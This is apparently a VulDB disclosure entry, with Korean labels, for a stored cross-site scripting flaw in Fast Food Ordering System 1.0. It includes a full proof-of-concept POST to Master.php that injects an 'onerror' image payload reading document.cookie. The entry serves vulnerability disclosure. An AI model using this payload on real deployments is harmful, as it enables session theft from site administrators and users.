| 제목 | Fast Food Ordering System 1.0 Stored Cross-Site Scripting |
|---|
| 설명 | #The Line 255 of Master.php sends unvalidated data to a web browser, which can result in the browser executing malicious code.
#echo $Master->save_category();
#PoC:
POST /ffos/classes/Master.php?f=save_category HTTP/1.1
Host: localhost
Content-Length: 480
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundarySmYVeqOBMhcSziZM
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/ffos/admin/?page=categories
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=junl7tbvb7hvrdeq776aislbcj
Connection: close
------WebKitFormBoundarySmYVeqOBMhcSziZM
Content-Disposition: form-data; name="id"
10
------WebKitFormBoundarySmYVeqOBMhcSziZM
Content-Disposition: form-data; name="name"
XSS
------WebKitFormBoundarySmYVeqOBMhcSziZM
Content-Disposition: form-data; name="description"
Testing XSS "><img src="" onerror="alert(document.cookie)">
------WebKitFormBoundarySmYVeqOBMhcSziZM
Content-Disposition: form-data; name="status"
1
------WebKitFormBoundarySmYVeqOBMhcSziZM-- |
|---|
| 원천 | ⚠️ https://cyberthoth.medium.com/fast-food-ordering-system-1-0-cross-site-scripting-7927f4b1edd6 |
|---|
| 사용자 | cyberthoth (UID 28322) |
|---|
| 제출 | 2022. 06. 03. AM 12:35 (4 연령 ago) |
|---|
| 모더레이션 | 2022. 06. 03. PM 02:36 (14 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 201276 [Fast Food Ordering System 1.0 Master List Master.php 설명 크로스 사이트 스크립팅] |
|---|
| 포인트들 | 17 |
|---|